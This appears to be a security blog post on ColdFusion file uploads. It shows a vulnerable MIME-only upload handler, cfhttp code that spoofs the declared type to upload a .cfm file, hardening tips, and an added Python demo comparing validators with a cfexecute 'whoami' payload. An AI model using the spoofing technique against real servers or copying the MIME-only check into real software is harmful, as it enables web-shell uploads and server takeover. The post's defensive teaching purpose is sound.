Think your file uploads are secure? Think again. Using this very simple technique with ColdFusion installed locally, you can spoof the MIME type of any file and get it uploaded to a server that only checks the declared type, which opens the door to code execution on that server.
First, we’re going to write a quick file upload script:
    <cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'>
        <cfinput type='file' name='FileUpload' required='yes' message='Select a file to upload.' /><br />
        <cfinput type='submit' value='Upload File' name='submit' />
    </cfform>
Notice that the form posts to an action page called uploadact.cfm, which is meant to accept only JPEGs and GIFs. That page handles the upload as follows:
    <!--- The accept list only compares the Content-Type the client sends with the file part;
          it never inspects the file's bytes or its extension. --->
    <cfif isDefined('form.fileUpload')>
        <cffile action='upload' fileField='fileUpload' destination='C:\path\to\upload'
                accept='image/jpeg,image/gif' nameconflict='makeunique'>
        <p>Thank you, your file has been uploaded.</p>
        <p><a href='/'>Return Home</a></p>
    </cfif>
Now for the fun part. We're going to write a page using cfhttp that runs on the attacker's server or workstation and uploads a file local to them, faking the MIME type with the mimetype attribute of cfhttpparam:
    <!--- The mimetype attribute becomes the Content-Type of the multipart file part,
          so the target's accept='image/jpeg,image/gif' check sees image/jpeg and passes the .cfm file. --->
    <cfhttp url='http://example.com/uploadact.cfm' method='post'>
        <cfhttpparam type='formfield' name='submit' value='Upload File'>
        <cfhttpparam type='file' name='FileUpload' file='C:\PathTo\test.cfm' mimetype='image/jpeg'>
    </cfhttp>
With this we could upload an ASP or ColdFusion based web shell that would essentially give us unrestricted access to the server. So follow these tips:
- If you have an Enterprise license, use Sandbox Security. This limits each site to its own set of directories and data sources.
- Disable cfexecute and cfregistry. If you can use Sandboxes, do this for each Sandbox, or set up a global Sandbox on your main site's directory. If you absolutely need cfexecute, remember that you can set up a Sandbox for a single folder with access to it and put your processing files there (say, to use FFMPEG for video conversion).
- Disable JSP (Adobe Instructions) if you don't actually use it. Since the default for ColdFusion on Windows is to run as System, any JSP file that makes its way onto the server will have full access, and JSPs don't follow Sandboxes, so even if Sandboxes are set up they are of no use against a JSP shell.
- Run ColdFusion as another user (Adobe Instructions). Running ColdFusion as a less privileged user prevents total control of your server should something malicious get uploaded.
- Always perform multiple checks on your file uploads: the extension, the declared type, and the actual content of the file (Pete Freitag has a good article on this).
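To make the cfhttp trick above and the last tip concrete, here is an added Python example that is not part of the original post. It builds the same multipart POST body that the cfhttpparam call produces (the file part carries whatever Content-Type the client declares), parses it back the way a server would, and runs two validators over it: one that trusts only the declared type, which is what accept='image/jpeg,image/gif' amounts to, and one that also checks the extension and the file's leading bytes. The field name FileUpload and the file name test.cfm come from the post; the boundary string, the function names and the sample file contents are constructed for this example.

```python
"""Added example: why a MIME-type-only upload check is spoofable, and a content check that is not."""
import os
import re

# Leading bytes (magic numbers) of the two image types the upload page means to accept.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# Extension allow-list, each mapped to the type its content must carry.
EXTENSION_TYPES = {".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".gif": "image/gif"}


def build_multipart(field_name, filename, content, declared_type, boundary="----cfhttpboundary"):
    """Build the multipart/form-data body cfhttp sends for the upload form above.

    Nothing ties the part's Content-Type to the bytes that follow it; the client
    declares it, exactly as the mimetype attribute of cfhttpparam does.
    """
    head = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="submit"\r\n\r\n'
        "Upload File\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
        f"Content-Type: {declared_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


def parse_multipart(content_type, body):
    """Minimal multipart parser: returns (filename, declared_type, data) of the first file part.

    Sufficient for bodies produced by build_multipart; not a general-purpose parser.
    """
    boundary = content_type.split("boundary=", 1)[1].encode()
    for raw in body.split(b"--" + boundary)[1:]:
        if raw.startswith(b"--"):
            break  # closing delimiter, no more parts
        if raw.startswith(b"\r\n"):
            raw = raw[2:]
        if raw.endswith(b"\r\n"):
            raw = raw[:-2]  # the CRLF before the next delimiter belongs to the delimiter
        header_blob, _, data = raw.partition(b"\r\n\r\n")
        headers = {}
        for line in header_blob.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if match:
            return match.group(1), headers.get("content-type", "application/octet-stream").lower(), data
    raise ValueError("no file part in body")


def mime_only_check(filename, declared_type, data):
    """What accept='image/jpeg,image/gif' does: trust the Content-Type the client sent."""
    return declared_type in MAGIC


def content_check(filename, declared_type, data):
    """Three independent checks: allowed extension, declared type agrees with the
    extension, and the first bytes carry that type's signature."""
    ext = os.path.splitext(filename)[1].lower()
    expected = EXTENSION_TYPES.get(ext)
    if expected is None or declared_type != expected:
        return False
    return any(data.startswith(sig) for sig in MAGIC[expected])


def run_demo():
    """Push three constructed uploads through both checks: the spoofed test.cfm from the
    post, the same payload renamed to .jpg, and a genuine (minimal) GIF."""
    shell = b"<cfexecute name='cmd.exe' arguments='/c whoami' timeout='5' variable='out'>\n"
    gif = b"GIF89a" + bytes(20)  # constructed: GIF header followed by filler bytes
    cases = (
        ("shell", "test.cfm", "image/jpeg", shell),
        ("renamed", "test.jpg", "image/jpeg", shell),
        ("gif", "photo.gif", "image/gif", gif),
    )
    results = {}
    for label, fname, declared, content in cases:
        ctype, body = build_multipart("FileUpload", fname, content, declared)
        parsed = parse_multipart(ctype, body)
        results[label] = (mime_only_check(*parsed), content_check(*parsed))
    return results


if __name__ == "__main__":
    for label, (naive, strict) in run_demo().items():
        print(f"{label:8s} mime-only accepts: {naive!s:5s}  content check accepts: {strict}")
```

The MIME-only check accepts all three uploads because every request declares an image type; the content check rejects the .cfm file on its extension and the renamed copy on its bytes, and accepts only the real GIF. Note that the content check still says nothing about what a valid image may do once served back (for example an image that also parses as a script), so keep the upload directory outside the web root or otherwise non-executable as well.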